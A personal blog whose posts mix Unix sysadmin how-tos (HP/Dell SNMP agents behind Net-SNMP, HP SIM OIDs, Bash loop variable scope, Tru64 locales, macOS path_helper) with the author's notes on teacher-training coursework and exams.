Just like everyone else HP also chooses to hide the installer for their SNMP agent quite deeply into their website. You will need to go to their download site and browse to the software section for your model of server. Once there you choose "Download drivers and software" and you pick your Linux flavour (in our case RHEL3). From there go to "Software - Systems management" where you can finally choose "A Collection of SNMP Protocol Tools from Net-SNMP for $YOUR_FLAVOUR". *phew* To help you get there, here's the direct link to the RHES3 version of the package.

As the file name (net-snmp-cmaX-5.1.2) suggests, this package is a modified version of the net-SNMP daemon which has added support for a whole bunch of Compaq and HP stuff. But as you can see the version of net-SNMP used is way behind today's standards, so it's wisest to use this daemon while proxied through a more current version of net-SNMP. The crappy thing though is that HP's package installs their net-SNMP in exactly the same location as our own net-SNMP. Don't worry, we'll get to that.

The download page doesn't make this immediately clear, but you'll need to download five (or six if you want the source) files. For your convenience, HP has decided to put all files into a pull-down menu, with one "Download" button. Yes, very handy indeed. =_= Another neat thing is that, for some reason, the combination Safari+Realplayer decides that -they- need to open the .RPM file that's loaded. Very odd and I've never encountered this before with other RPMs.

Because we're going to use two versions of net-SNMP that use the same locations on your hard drive, we're going to have to fiddle around a bit.

First copy these two RPMs to your system: net-snmp-cmaX and net-snmp-cmaX-libs. Install them using RPM, starting with libs and ending with the basic package. Now do the following.

$ cd /usr/sbin
$ sudo mv snmpd HPsnmpd
$ sudo mv snmptrapd HPsnmptrapd
$ cd /etc
$ sudo ln -s ./snmpd.conf ./HPsnmpd.conf
$ cd /etc/rc.d/init.d
$ sudo mv snmpd HPsnmpd
$ sudo mv snmptrapd HPsnmptrapd
$ cd /etc/logrotate.d
$ sudo mv snmpd HPsnmpd

You've now made sure that all parts that are required for the HP SNMP agent are safe from being overwritten by the "real" net-SNMP.

You can now install net-SNMP using the instruction laid out in the following paragraph.


Re-compiling Net-SNMP

PLEASE NOTE: If you're going to use HP SIM, please install that -first- before proceeding. See below for details.

Basically, recompiling Net-SNMP for your Linux install follows the same procedure as the recompilation on Solaris.

  1. Download the source code for Net-SNMP version 5.2.3 (or a newer version, if you wish) from their website.
  2. Move the .TGZ to your build system and unpack it in your regular build location. Also, building Net-SNMP successfully requires OpenSSL 0.9.7g or higher, so make sure that it's installed on your build system.
  3. Run the configure script with the following options:

    --with-mib-modules="host disman/event-mib ucd-snmp/diskio smux agentx disman/event-mib ucd-snmp/lmSensors" --with-perl-module

  4. Run "make", "make test" and "make install" to complete the creation of Net-SNMP.

  5. After "make install" has finished all the Net-SNMP files have been installed on your build system. Naturally it's important to know which files to include in your package. I will make a full listing of all files RSN(tm)..

Installing Dell OpenManage and its components.

I had a hard time finding the installer files for Dell OM on Dell's download site, until I finally figured out how their "logic" works. :D You can get Dell OM 4.5 for Linux through this direct link (which can be changed at any time by Dell), or you can search their downloads page using the term "openmanage server agent". Adding the key word "linux" seems to confuse it though, so you're going to have to manually search through the list.

Unfortunately I never did get around to using Dell OpenManage, so I cannot give you the installation instructions ;_;


Configuring HP-SIM

The configuration file for HP's version of net-SNMP is stored in /etc/snmp, unlike the version that'll be used by our own net-SNMP. Edit HP's config file and remove all the current content. Replace it with the following:

rocommunity public 0.0.0.0

agentaddress 1162

pass .1.3.6.1.4.1.4413.4.1 /usr/bin/ucd5820stat

You will not have to make any further changes. The init-script and such can remain unchanged.


Configuring Dell OpenManage

Again, unfortunately I cannot give you instructions on working with OpenManage since I ran out of time.

rocommunity public 0.0.0.0

agentaddress 1163


Configuring Net-SNMP

The configuration file for Net-SNMP is located in /usr/local/share/snmp. You will need to make a whole bunch of changes over here that I won't cover, like security ACLs, SNMP trap hosts and bunches of other stuff. However, you _will_ need to add the following lines to allow Net-SNMP to talk to HP SIM and/or OpenManage.

# Pass requests to HP SIM

proxy -c public localhost:1162 .1.3.6.1.4.1.232

# Pass requests to Dell OpenManage

proxy -c public localhost:1163 .1.3.6.1.2.1.674


Starting the software

Make sure that you start Net-SNMP before OpenManage or SIM. These sub-agents rely on Net-SNMP to be running, so that one needs to go first. Take care of this order using the RC scripts of your particular Linux flavour.



kilala.nl tags: , , ,

View or add comments (curr. 0)

Interesting HP SIM (Insight Manager) SNMP objects

2008-01-01 00:00:00

In my mini-howto about monitoring HP and Dell specific SNMP objects through Net-SNMP I referred to a few interesting objects which could be read through their respective SNMP agents. This page covers the interesting objects for HP Compaq systems.

Right now I've only got a very limited number of different models to test all this stuff on, so bear with me :) The following lists are only a small selection of all possible objects that we found interesting. A full list of available options can be obtained by running:

snmpwalk -c public localhost .1.3.6.1.4.1.232

I've tried my best at making the more interesting parts of the HP and Dell MIBs legible. The results can be found in the PDF, in the menu on the left. But once again, these lists are only a small subset of the complete MIB for both vendors. You won't know all that's available to you unless you start digging through the flat .TXT files yourself. Unlike Sun, HP and Dell -do- publish their MIB files freely, so you'll have no trouble finding them on the web.

I've also expanded on the HP SIM MIB a little in a PDF document. Get it over here.


On the monitoring of disks.

Unfortunately, HP and Compaq have made it impossible to monitor hard disk statuses without add-on software. The plain vanilla SNMP agent has no way of filling the relevant objects. Instead it requires the CPQarrayd add-on.

If you do choose to install this piece of software, you can find all the objects regarding -internal- drives under OID .1.3.6.1.4.1.232.3.2.5.2 (cpqDaPhyDrvErrTable). Refer to CPQIDA.MIB.txt for all relevant details and a full listing of the appropriate OIDs.

Currently I have no way of making sure, but I assume that the alert message for HDD[0-7] can be found in .1.3.6.1.4.1.232.3.2.5.2.1.15.[0-7]. Any value above 0 indicates a failure.
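If that assumption holds on your systems (verify it first), a quick sweep over all eight drives might look like this sketch; the host and community string are placeholders:

for DISK in 0 1 2 3 4 5 6 7
do
    VAL=`snmpget -c public localhost .1.3.6.1.4.1.232.3.2.5.2.1.15.$DISK | awk '{print $NF}'`
    [ "$VAL" -gt 0 ] && echo "HDD$DISK reports a failure (status $VAL)"
done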


Basic Object Identifiers

All object IDs below fit under .1.3.6.1.4.1.232. These objects should be usable on every HP system in the DL/ML range, although I have only tested them on the DL380, DL385, DL580 and ML570.

Object              | Description              | Values
.1.2.2.1.1.6.OID    | CPU[0-3] status          | 1/2 = ok, 3 = warn, 4 = crit
.3.2.2.1.1.6.OID    | HDD controller           | 1/2 = ok, 3 = warn, 4 = crit
.3.2.3.1.1.11.OID   | LDD[0-X] status          | 1/2 = ok, 3 = warn, 4 = crit
.3.2.4.1.1.6.OID    | Hot spare HDD status     | >2 = crit
.3.2.5.1.1.37.OID   | HDD[0-X] status          | 1/2 = ok, 3 = warn, 4 = crit
.5.2.2.1.1.12.OID   | SCSI controller status   | 1/2 = ok, 3 = warn, 4 = crit
.5.2.3.1.1.8.OID    | SCSI LDD[0-X] status     | 1/2 = ok, 3 = warn, 4 = crit
.5.2.4.1.1.26.OID   | SCSI HDD[0-X] status     | 1/2 = ok, 3 = warn, 4 = crit
.6.2.6.7.1.9.OID    | Fan status               | 1/2 = ok, 3 = warn, 4 = crit
.6.2.6.8.1.4.1      | CPU0 temperature         | Contains current temperature
.6.2.6.8.1.4.4      | CPU1 temperature         | Contains current temperature
.6.2.6.8.1.4.5      | PSU temperature          | Contains current temperature
.6.2.9.3.1.4.0.OID  | PSU[0-X] status          | 1/2 = ok, 3 = warn, 4 = crit
.14.2.2.1.1.5.OID   | IDE HDD[0-X] status      | 1/2 = ok, 3 = warn, 4 = crit


Fan and sensor placement

As I already said, most of the OIDs from the tables above can be used to monitor vanilla HP systems (with the exception of the hard disks). The biggest difference lies in the placement of certain fans and sensors. The tables below outline the various locations, depending on the model.

Each system contains multiple fans and temperature sensors and will thus have multiple instances of these objects in its SNMP tree. The locations for each of these instances can be read from .6.2.6.7.1.3.OID (fans) and .6.2.6.8.1.3.OID (temperature sensors). The OID part of these numeric sequences is always .1.1, .1.2, .1.3, .1.4 and so on.

Fan   | DL380    | DL385    | DL580    | ML570
.1.1  | CPU      | CPU      | System   | ?
.1.2  | CPU      | CPU      | System   | ?
.1.3  | IO Board | IO Board | System   | ?
.1.4  | IO Board | IO Board | System   | ?
.1.5  | CPU      | CPU      | IO Board | ?
.1.6  | CPU      | CPU      | IO Board | ?
.1.7  | PSU      | PSU      | -        | ?
.1.8  | PSU      | PSU      | -        | ?

Sensor

DL380

DL385

DL580

ML570

.1.1

CPU

CPU

CPU

?

.1.2

CPU

IO Board

CPU

?

.1.3

IO Board

CPU

CPU

?

.1.4

CPU

CPU

CPU

?

.1.5

PSU

PSU

IO Board

?

.1.6

-

-

Ambient

?

.1.7

-

-

System

?



kilala.nl tags: , , ,

View or add comments (curr. 0)

SANE 2006 conference notes

2008-01-01 00:00:00

In May of 2006 I attended the SANE 2006 conference. While there I took a lot of notes at various courses and panels. All my notes can be found below, as PDF documents.


kilala.nl tags: , ,

View or add comments (curr. 0)

SAN data migration scripts

2008-01-01 00:00:00

It's been way too long since I used these scripts. I believe they stem from 2003.

I'll need to write some more about them later. For now, know that I used these scripts to prepare for data migrations between local systems and SAN boxen. We moved from local to EMC2, then we moved from EMC2 to HP XP-1024.


kilala.nl tags: , , ,

View or add comments (curr. 0)

PHP-Syslog update: admin mode

2008-01-01 00:00:00

At $CLIENT I've built a centralised logging environment based on Syslog-ng, combined with MySQL. To make anything useful out of all the data going into the database we use PHP-syslog-ng. However, I've found a bit of a flaw in that software: any account you create has the ability to add, remove or change other accounts... Which kinda makes things insecure.

So yesterday was spent teaching myself PHP and MySQL to such a degree that I'd be able to modify the guy's source code. In the end I managed to bolt on some sort of "admin-mode" which allows you to set an "admin" flag on certain user accounts (thus giving them the capabilities mentioned above).

The updated PHP files can be found in the TAR-ball in the menu of the Sysadmin section. The only thing you'll need to do to make things work is to either:

  1. Re-create your databases using the dbsetup.sql script.
  2. Add the "admin" column to the "users" table using the following command. ALTER TABLE users ADD COLUMN baka BOOLEAN;

The update is available as a .TAR file. Get it over here.


kilala.nl tags: , ,

View or add comments (curr. 0)

The scope of variables in shell scripts

2008-01-01 00:00:00

Just today I ran into something shiny that piqued my interest. A shell script I'd written in Bash didn't work like I expected it to, with regards to the scope of a variable. I thought the incident was interesting enough to report, although I won't go into the whole scoping story too deeply.

What it basically boils down to is that there was a difference in the way two shells handle a certain situation. A difference that I didn't expect to be there. Not that exciting, but still very educational.


Scope?

Yeah. In most programming languages variables have a certain range within your program, within which they can be used. Some variables only exist within one subroutine, while others exist across the whole program or even across multiple parts of the whole.

In shell scripting things aren't that complicated, luckily. In most cases a variable that's set in one part of the script can be used in every other part of the script. There are some notable exceptions, one of which I ran into today without realising it.


The real code

My situation:

I have a command that outputs a number of lines, some of which I need. The lines that I'm interested in consist of various fields, two of which I need as variables. Depending on the value of one of these variables, a counter needs to be incremented.

I guess that sounds kinda complicated, so here's the real code snippet:

function check_transport_paths
{
    TOTAL=`scstat -W | grep "Transport path:" | wc -l`
    let COUNT=0

    scstat -W | grep "Transport path:" | awk '{print $3" "$6}' | while read PATH STATUS
    do
        if [ $STATUS == "online" ]
        then
            let COUNT=$COUNT+1
        fi
    done

    if [ $COUNT -lt 1 ]
    then
        echo "NOK - No transport paths online."
        exit $STATE_CRITICAL
    elif [ $COUNT -lt $TOTAL ]
    then
        echo "NOK - One or more transport paths offline."
        exit $STATE_WARNING
    fi
}


Where it goes wrong

While testing my script, I found out that $COUNT would never retain the value it gained in the while-loop. This of course led to the script always failing the check. After some fiddling about, I found out that the problem lay in the use of the while loop: it was being used at the end of a pipe.

To illustrate, the following -does- work.

let COUNT=0
while read i
do
    let COUNT=$COUNT+$i
    echo $COUNT
done

echo "Total is $COUNT."

This leads to the following output.

$ ./baka.sh
1
1
2
3
3
6
4
10
^D
Total is 10.

However, if I were to create a script called neko.sh that outputs the numbers one through four on separate lines, which is then used in baka.sh... well... it doesn't work :D Regardez!

let COUNT=0
./neko.sh | while read i
do
    let COUNT=$COUNT+$i
    echo $COUNT
done

echo "Total is $COUNT."

This gives the following output

1
3
6
10
Total is 0.

Conclusions

After discussing the matter with two of my colleagues (one of them as puzzled as I was, the other knowing what was going wrong) we came to the following conclusion: when a while loop sits at the end of a pipeline, the shell runs it in a sub-shell, so any changes made to $COUNT inside the loop are lost the moment the loop finishes.

This conclusion is supported by an example in the "Advanced Bash-scripting guide" by Mendel Cooper. In that example an additional comment is made about the scoping of variables with redirected while loops. The comment warns that older shells branch a redirected while into a sub-shell, but also tells us that Bash and Ksh handle this properly.

I guess our version of Bash is too old :3

Workaround
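
A minimal sketch of one common way around it (a reconstruction, not the exact code we ended up with): dump the command output into a temp file and redirect that into the loop, so the while runs in the current shell and $COUNT keeps its value. Note the rename from PATH to TPATH; once the loop runs in the current shell, re-using PATH as a read variable would clobber your actual search path.

TMPFILE=/tmp/transport.$$
scstat -W | grep "Transport path:" | awk '{print $3" "$6}' > $TMPFILE

let COUNT=0
while read TPATH STATUS
do
    if [ "$STATUS" == "online" ]
    then
        let COUNT=$COUNT+1
    fi
done < $TMPFILE     # redirection instead of a pipe: no sub-shell, so COUNT survives the loop

rm -f $TMPFILE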

A word of thanks

I'd like to thank my colleagues Dennis Roos and Tom Scholten for spending a spare hour with me, hacking at this problem. And I'd like to thank Ondrej Jombik for pointing out the fact that this article didn't make my conclusions very clear in its original version.


kilala.nl tags: , , ,

View or add comments (curr. 28)

Speaking of educators...

2007-12-11 20:17:00

As you can imagine, this whole deal about the New Learning has the whole country in uproar. Teachers, educators, students, parents, scientists, educationists and simple bystanders: everyone has an opinion, well-informed or otherwise.

And of course, as things go with conflict, most of the people are only willing to see things black or white. "You're with us, or against us!" Stuff like that. To aid each party in their cause, public fora have appeared on the Internet: the opponents seem to gather at Beter Onderwijs Nederland, while the proponents assemble at Natuurlijk Leren.

So far I haven't joined any discussions at the latter, opting instead to visit the BON site. This is in part due to the fact that I like their website design a lot better (it's more transparent). BON's opponents typecast them as grouchy, old men who are completely stuck in their ways and who disparage any ideas that are not their own. And unfortunately they're not doing much to break down those stereotypes.

So far the questions and opinions I have voiced (which partially contradict their own) have been met with derision and hidden insults. Which is a shame, because I think there's a lot to learn from healthy discussions. I'm still studying to become a teacher, so I'll grasp any straw that may include some new information.

Of course, I have no desire whatsoever to have my ambitions quashed by snide remarks. I'll try and maintain a level head in my forum discussions. Developing a thicker skin may actually help protect me from students later on. ^_^ Of course, if things keep going like they are I'll just leave BON again. Practicing my debating skills is one thing, letting people sap at my enthusiasm is something else entirely.


kilala.nl tags: , ,

View or add comments (curr. 0)

A day off? Schoolwork it is!

2007-12-11 20:05:00

I'd taken the day off from work today, in order to work on a school project. This project has each group looking into the so-called New Learning (which really isn't new, but just different), in hopes that we learn something about recent education reforms.

You see, over the past few years the Netherlands have seen quite a few changes to their educational system. One of the big-ass ones, is the move from class-based education, towards a more individual approach. If you're interested, we're discussing the matter over here, at Ars Technica.

Among other tasks, each group member is expected to pay a visit to a New Learning school. I decided to be a little off-beat and opted for a democratic school (which are actually quite rare in the NL): De Kampanje.

The talk I had with one of their staff members was rather educational. I will probably never see eye to eye with them on schooling, but it -is- always interesting to hear new ideas. Such talks allow me to take a step back and take another look at the work I'm doing myself.

De Kampanje bases most of their work on steps that have already been taken by the Sudbury Valley School in the US. Most of their ideas really are quite daring and I'm sure that 95% of today's educators would be infuriated even thinking of them.

For now I will refrain from fully forming an opinion on their methods. I still have to write an objective paper on the issue ~_^


kilala.nl tags: ,

View or add comments (curr. 0)

My strategy for this semester and the next

2007-12-08 12:21:00

I'm going to have to fit in various "unwieldy" tasks, that will not fit properly into my normal agenda. Among others, I'm expected to make multiple visits to schools: to talk to students, to teach classes, etc. Given my normal day job this is simply impossible. I've also fallen slightly behind in a few areas, so I'm going to have to shuffle things around to make it all work.

This semester:

* I have to finish last semester's General didactics, or I'm going to fail it completely. That would mean I'd have to completely redo the course next year.

* I've already dropped the maths part of Analysis 1 in order to make room for other stuff.

* I'm going to postpone my work for SLB and WER, after conferring with my teacher. She understood my need to make room in my schedule.

* I will finish both Kijk op leerlingen and Analysis 1 - Didactics on time.

Next semester:

* I'll drop the second year's Counseling and mentoring project, so I can take it next year. That ought to free up enough time to finish this semester's SLB and WER and to tie up any loose ends.


kilala.nl tags: ,

View or add comments (curr. 0)

That's one big feather up my ass!

2007-12-03 22:07:00

Awesome! One of my teachers just gave me a big-ass compliment!

In the first three weeks of the Analysis 1 Didactics course, I'd turned in my first four reports. So far Theo's graded three of them, giving each a 90%.

Today he came up to me to tell me that he thought my work was extraordinary, because of all the extra research I put in. He also wanted to know whether I'd allow him to distribute my reports among his colleagues. He thought they'd be useful, to set an example of what they'd expect of their students.

Hot diggity! ^_^;;


kilala.nl tags: , ,

View or add comments (curr. 5)

Installing additional locales on Tru64

2007-11-28 10:48:00

Wow, that was a fight :/

A few days ago we had a "new" TruCluster installed, running Tru64 5.1b. All of the stuff on it was plain vanilla, which meant that we were bound to run into some trouble. Case in point: the EMC/Legato Networker installation.

Upon installation setld complained as follows:

==========

Your choice:

1 LGTOCLNT999 EMC NetWorker Client

cannot be installed as required subset IOSWWEURLOC??? is not available.

==========

As the name suggests (EURLOC) the missing files involve the additional European locales that are not part of the default installation.

After fighting and searching and swearing a lot I got things sorted out as follows:

1. Get the Tru64 CD-ROM that was used for the installation. You'll need the "Associated Products 1" CD.

2. Insert the CD into your system.

3. Mount the CD: mount -r /dev/disk/cdrom1c /mnt

4. cd /mnt/Worldwide_Language_Support/kit

5. setld -l `pwd` IOSWWEURLOC540

This will install the locale I needed. Of course you are free to substitute the names of other locales as well.
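
To double-check afterwards that the subset actually landed, something along these lines should do (setld's inventory listing):

setld -i | grep EURLOC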

EDIT:

Also, feel free to read through the proper instructions.


kilala.nl tags: , , ,

View or add comments (curr. 1)

A different kind of hacking

2007-11-25 22:40:00

You know? This whole college deal, burning the midnight oil over homework, feels like hacking to me. It gives me the same feeling I had during my internships or during late-night projects at the office. A feeling that I'm completely into what I do and that I want to keep on going.

Case in point: tonight I'm working on a report for Analysis 1 - Didactics, scratching away at my whiteboard. And of course I turn to the music I always play at times like these.

If you're curious, the song's Funky doll from the original Bubblegum Crisis soundtrack.

It's awfully eighties, but there's something I just love about that song. Of course, I'm also glad there was no video camera there to register my gay-ass dancing at the board. There's just something weird about a geek dancing, while working ^_^;


kilala.nl tags: , ,

View or add comments (curr. 0)

Yay, for more results

2007-11-19 23:29:00

Yay for more test results :)

Remember that one report that had me worried so much? Well, it came back a 70% so it wasn't all bad :)

Also, that one test I was waiting for (on General didactics) came back a whopping 80%! Awesome!


kilala.nl tags: ,

View or add comments (curr. 2)

path_helper: sometimes Apple does kludgy, stupid things

2007-11-18 15:24:00

I've always been quite happy about most of the stuff Apple does. A lot of their solutions to problems are elegant and pretty. However, there are also some cases in which they do awful stuff under the hood. Stuff that makes me cringe in disgust.

Case in point, the new path_helper command.

I've been an avid user of LaTexIT, a LaTex helper programme, for a few months now. It's great how easy it makes the creation of mathematical equations in LaTex.

Unfortunately LaTexIT doesn't yet work flawlessly on Leopard. One of the things that goes wrong is the fact that it just won't start :D After trying to start the app a few times, I noticed a run-away process called path_helper.

I asked Pierre whether path_helper might be tied to the problems he's having, because we don't often get run-away processes. Pierre confirmed that others have hinted at path_helper as well, but that he isn't quite sure yet. Unfortunately he doesn't have a Leopard license yet, so he can't debug the problems yet (hint: make a donation if you use LaTexIt! Pierre could use a Leopard license!).

To help him out, I dug around a little bit. What follows is what I e-mailed Pierre. If you don't want to read through the whole bit, here's the summary:

Apple wants to make it easy to expand the $PATH variable for every user on the system automatically. Instead of tagging on new PATH= lines onto the end of /etc/profile, they've created the path_helper command that gets called by /etc/profile. Path_helper reads directory paths from the text files in /etc/paths.d and appends these paths to $PATH.

So because they want to make it just a -little- easier to add to $PATH, they've:

* Created a new directory structure under /etc/paths.d

* Allow new apps or environments to add text files to /etc/paths.d

* Created a new command which simply reads text files and barfs out shell commands.

* Thus broken the Unix standard way of globally setting $PATH.

Good going Apple! You bunch of schmucks!

======================================================

Hmm, this seems to be a weird little extra tool that Apple has tagged onto the OS. I'm not sure if it's the most elegant solution to the problem. I see what they want to do though: they want to be able to easily make adjustments to the $PATH variable for all users on the system.

Personally I'd just use the global profile in /etc, but apparently Apple have chosen a roundabout way.

Each user's .profile calls that path_helper process. The only thing that path_helper does is generate the requisite sh/csh commands to adjust the $PATH variable.

From the manpage:

=====================

path_helper(8)            BSD System Manager's Manual            path_helper(8)

NAME
     path_helper -- helper for constructing PATH environment variable

SYNOPSIS
     path_helper [-c | -s]

DESCRIPTION
     The path_helper utility reads the contents of the files in the directories
     /etc/paths.d and /etc/manpaths.d and appends their contents to the PATH and
     MANPATH environment variables respectively.

     Files in these directories should contain one path element per line.

     Prior to reading these directories, default PATH and MANPATH values are
     obtained from the files /etc/paths and /etc/manpaths respectively.

     Options:

     -c   Generate C-shell commands on stdout. This is the default if SHELL
          ends with "csh".

     -s   Generate Bourne shell commands on stdout. This is the default if
          SHELL does not end with "csh".

NOTE
     The path_helper utility should not be invoked directly. It is intended only
     for use by the shell profile.

Mac OS X

END

=====================

So instead of putting PATH=$PATH:/usr/whatever/bin in /etc/profile, Apple have decided to make a new config file: /etc/paths.d. This config file will list all directories that need to be appended to the default $PATH.

/me looks at /etc/paths.d

Actually... It's a directory, containing text files with directory paths. For example:

=====================

Kilala:~ thomas$ cd /etc
Kilala:etc thomas$ cd paths.d
Kilala:paths.d thomas$ ls
X11
Kilala:paths.d thomas$ ls -al
total 8
drwxr-xr-x   3 root wheel  102 24 sep 05:53 .
drwxr-xr-x  91 root wheel 3094 13 nov 21:11 ..
-rw-r--r--   1 root wheel   13 24 sep 05:53 X11
Kilala:paths.d thomas$ file X11
X11: ASCII text
Kilala:paths.d thomas$ cat X11
/usr/X11/bin

=====================

I guess Apple's reasoning is that it's easier to add extra text files to /etc/paths.d, than it is to add a new PATH= line to /etc/profile. Personally, I think it's an inelegant (and rather wasteful) way of doing things :/

Wait, it's even worse! The path_helper gets called from /etc/profile! Ugh! :(

=====================

Kilala:~ thomas$ cd /etc
Kilala:etc thomas$ cat profile
# System-wide .profile for sh(1)
if [ -x /usr/libexec/path_helper ]; then
    eval `/usr/libexec/path_helper -s`
fi
if [ "${BASH-no}" != "no" ]; then
    [ -r /etc/bashrc ] && . /etc/bashrc
fi

=====================

Let's see what happens when I run the command...

=====================

Kilala:etc thomas$ /usr/libexec/path_helper -s
PATH="/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin:/usr/X11/bin"; export PATH
MANPATH="/usr/share/man:/usr/local/share/man:/usr/X11/man"; export MANPATH

=====================

What a totally stupid and annoying way of doing this. What's worse, I'm quite sure it also breaks the Unix-compliancy of Leopard when it comes to standards for setting $PATH.

Hmm :/
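
For completeness' sake: if you wanted to push your own directory into everyone's $PATH using Apple's scheme, it would look roughly like this. The /usr/local/mystuff path and the file name are made up, of course.

$ sudo sh -c 'echo /usr/local/mystuff/bin > /etc/paths.d/mystuff'
$ /usr/libexec/path_helper -s

The second command should then spit out a PATH= line with the new directory tacked onto the end.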


kilala.nl tags: , , ,

View or add comments (curr. 12)

Ouch, Analysis-1 is going to be a toughy

2007-11-17 11:55:00

Careful now, this may sting a little... o_O

This semester we're covering Analysis 1, which requires a wholly new way of thinking. Where Statistics 1 was pure maths and calculation, this course requires something additional: insight and a sense of logic.

The thing about this course is that it's all about proving maths. Not using maths to prove stuff, but proving the mathematical equations themselves.

Folks who aren't too hot on math may want to skip the next section :D

==========

For example, the calculation shown above belongs to the question "Prove or disprove that (k^2 - 1) is divisible by eight, for all values of k that are odd integers". "Odd" in this case is opposed to "even".

So, how do you even get started on such a question?! Well, you start filling in bits and pieces, starting out by equating k to (2n + 1). Why? Because one can make -any- odd number by taking integer n, multiplying it by 2 (thus becoming an even number) and then adding 1.

Once all of that is done we're left with 4(n^2 + n). In order for the original theory to be right, this'd mean that any value of (n^2 + n) needs to be even. And that's what I'm testing in the second and third lines: first for even numbers, then for odd numbers. And indeed, both tests come out positive: any value for n will result in an even number.

Pulling this back to the original theory means that any outcome is indeed divisible by eight, because four times any even number is always divisible by eight.

==========
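
Not a proof of course, but for a quick sanity check from the command line this one-liner will do (plain Bash arithmetic):

$ for k in 1 3 5 7 9 11 13; do echo "k=$k : (k^2 - 1) mod 8 = $(( (k*k - 1) % 8 ))"; done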

Joy!... I've always sucked at being insightful, so a lot of these "tricks" don't come naturally to me. Then again, I used to get good grades for math and even for stuff like this. I ought to be able to get the hang of it again.

I hope ^_^;;


kilala.nl tags: , , ,

View or add comments (curr. 1)

Return of the Word 2004 FontCacheTool troubles

2007-11-15 19:09:00

Darn... Fighting this little bit of trouble just cost me half an hour and a good chunk of my mood.

After installing the OS X 10.4.11 update, the MS Word 2004 FontCacheTool problems I had back in 2006 arose again. Apparently this part of MS Office regularly gets into trouble with OS X's fonts and caches *grr*

I tried to get rid of the problem in a nice way by disabling any duplicate fonts and by removing the font cache. But that didn't help me any. So instead I reckoned I'd play it dirty; I didn't have time to play with Word.

$ cd /Applications/Microsoft*/Office/Support*

$ sudo mv FontCacheTool FontCacheTool.orig

Screw that piece of kit... If it doesn't want to play nicely, it won't get to play at all. Of course, that's not the proper solution. On the upside of things, Word does boot up very quickly now! ^_^;
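
Should you ever want to give FontCacheTool another chance, putting it back is just the reverse of course:

$ cd /Applications/Microsoft*/Office/Support*
$ sudo mv FontCacheTool.orig FontCacheTool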


kilala.nl tags: , ,

View or add comments (curr. 0)

How do you make grownups re-learn basic maths?

2007-11-15 13:20:00

This semester, the didactics course that's part of Analysis 1 focuses on the teaching of basic maths to children. What kind of troubles do they run into? What are common mistakes they make? How does learning maths even work?!

Of course it's a bit hard for a bunch of grownups to sympathize with the issues kids run into. Adults have been calculating things in their heads for decades and everything's become an automatic process.

8 + 5? The answer "13" automatically pops up in my head. No need to even think about it. 2 x 20? Boom! "40".

So how do you make adults relive their days of learning basic maths?

By making them do maths in base-8, ie octal counting.

Using the classic method known as the Land of Okt (het land van Okt), aspiring teachers are introduced to the problems of learning maths. We're using a book published by APS, though there's also a book dedicated to this specific subject.

I have to say that it's an interesting and somewhat frustrating experience. It feels odd to break down addition and multiplication into steps again. I.e.: 3 + 9 = 3 + 5 + 4 = 14. Or: 4 x 5 = 2 x 12 = 24. Don't even get me started about fractions :D
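
If you want to cheat while checking your Land of Okt homework, Bash can do the base-8 arithmetic for you. The 8# prefix marks octal input and %o prints octal output; note that what we'd write as 9 becomes 11 in the Land of Okt.

$ printf '%o\n' $(( 8#3 + 8#11 ))     # 3 + 11 in Okt, i.e. 3 + 9 for us: prints 14
$ printf '%o\n' $(( 8#4 * 8#5 ))      # 4 x 5: prints 24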

Yeah... Good stuff! If you're curious to see some of the assignments we're doing, check the Wiki page for week 1.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Microsoft Sharepoint: collaborating on documents

2007-11-14 17:17:00

A Dutch translation of this page can be found here, on my Wiki.

During my second semester at Hogeschool Utrecht I got into my first group assignment. The five of us had to work together on a project for Kijk op Leerlingen 1, which is a course focussing on student identity and psychology.

School expects us to store all of our reports and materials on a dedicated Sharepoint site. Now, you know that when multiple people start working on the same documents, things are going to get messy. So in order to prevent mayhem, I've created a short HOWTO for my project buddies.

Making sure you don't work on the same thing, at the same time.

With software like Sharepoint it's very easy to start mixing up versions of documents. For example, let's say that both Badegul and Arjan have downloaded the file called Foobar.doc. Both of them are making changes to the document on their own computers. First Arjan uploads the new document to Sharepoint. Then Badegul does the same.

Now there's a problem! Because all the work that Arjan has done, has now been overwritten by Badegul's document. All of his work is lost. Of course, it's still stored on his own computer, but that's besides the point.

In order to prevent multiple people from working on the same document, at the same time, here are some simple rules. All of this is explained in the video below.

  1. Never continue working from a document on your computer. Always download a new version from Sharepoint.
  2. Before you start working on the document, use the "checkout" command.
  3. The only one who can make changes to the Sharepoint version of the document, is the one who checked out the file.
  4. After you're done working on the document, upload a new version.
  5. After uploading the new file, "checkin" the file so others can work on it.
  6. If a document is already checked out, DO NOT start working on it! Contact the person who's checked out the document, to see when he/she is done with it.

One of the risks in working this way is that one person can keep a file locked indefinitely. So please, keep an eye out! If you're done working for now, please upload your file and check it in. Don't keep a document checked out, unless you're really working on it.

Click here to open or download the movie.

What if you need to work on the same document together?

If you're in a situation where multiple people need to work on the same document, then things get interesting.

Put one person in charge of the document; this is the person who'll do the checkout and checkin. Now everyone can start working, BUT with one difference. The person in charge has the document itself. All the others only send their -changes- to this person. Thus, they tell the person in charge exactly what needs to be changed and where.

The person in charge then gathers all the changes into the main document and uploads the new version to Sharepoint.


kilala.nl tags: , , ,

View or add comments (curr. 0)

More test results have come in

2007-11-12 23:38:00

Hooray for more good results!

It's been confirmed that the first result that I got back (see a few days ago) was actually an 8,3! /o/ That's the equivalent of an 83%. Nice!

And the reports I'd turned in for Statistics 1 (all of which can be found over here) were also good for a G (and hence an 8, or 80%). Fsckin' A!


kilala.nl tags: ,

View or add comments (curr. 5)

First exam result is in

2007-11-11 10:00:00

I just checked Osiris (my school's online student administration site) and found my first test result.

Statistics 1 came back a G, which is equivalent to a 7, or a 7,5 if I'm not mistaken. My expectations were spot on :)


kilala.nl tags: ,

View or add comments (curr. 3)

Here I go: my first exams in college

2007-11-05 09:57:00

My calculator, my pens, my reports and my summaries.

So... Exciting day! Today's the first time I'm taking exams for my new college education. Of course I've done all of this before, but that was years ago!

I've got two tests scheduled for today:

* 1200 - 1400 = Statistics 1.

* 1800 - 2000 = Didactics 2.

So yeah, I've got four hours of wasted time in between my tests. I'll use that to go through the summaries some more and to relax a little.

Well, here I go ^_^ Faito!


kilala.nl tags: , ,

View or add comments (curr. 2)

Leopard and new text-to-speech voices

2007-11-04 10:49:00

A small forum discussion at Ars Technica alerted me to one of the new features in OS X Leopard. Apple'd been working on a more lifelike voice-over, which resulted in the voice Alex. I have to say that it's pretty damn impressive, the way they make Alex sound rather lifelike.

What's even scarier is the fact that somehow Apple worked in little breathing-effects as well. There's something weird about hearing your computer draw breath before it starts to speak a sentence.

EDIT:

